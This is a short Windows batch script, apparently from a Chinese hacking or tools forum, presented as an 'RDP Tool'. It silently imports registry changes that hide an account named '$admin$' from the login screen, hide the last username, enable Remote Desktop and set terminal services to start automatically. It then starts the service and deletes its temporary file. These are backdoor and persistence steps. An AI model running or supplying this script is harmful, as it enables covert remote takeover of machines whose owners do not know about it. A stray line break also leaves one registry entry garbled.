|
@echo off
rem Windows RDP Tool by QQ 329070004
echo Windows Registry Editor Version 5.00 > tmp.reg
echo.>> tmp.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> tmp.reg
echo \"$admin$\"=dword:00000000 >> tmp.reg
echo.>> tmp.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system] >> tmp.reg
echo \"dontdisplaylastusername\"=dword:00000001 >> tmp.reg
echo.>> tmp.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> tmp.reg
echo \"fDenyTSConnections\"=dword:00000000 >> tmp.reg
echo \"TSEnabled\"=dword:00000001 >> tmp.reg
echo.>> tmp.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >> tmp.reg
echo \"EnableAdminTSRemote\"=dword:00000001 >> tmp.reg
echo.>> tmp.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> tmp.reg
echo \"ShutdownWithoutLogon\"=\"0\" >> tmp.reg
echo.>> tmp.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >> tmp.reg
echo \"Start\"=dword:00000002 >> tmp.reg
echo.>> tmp.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >> tmp.reg
echo \"Start
\"=dword:00000002 >> tmp.reg
regedit /s tmp.reg
del tmp.reg
net start termservice |
批处理, Vista, Windows, 壁纸, Windows, 电脑, 黑客, linux, FTP, 系统, 软件, 卡巴斯基, 程序, Vista, 论坛, 图标, 图标, ROS, 路由, 宽带, 系统, ndeer, Ghost, 服务器, 密码, 诺德尔, 网吧, Windows, FTP, 诺德尔, 系统, server
|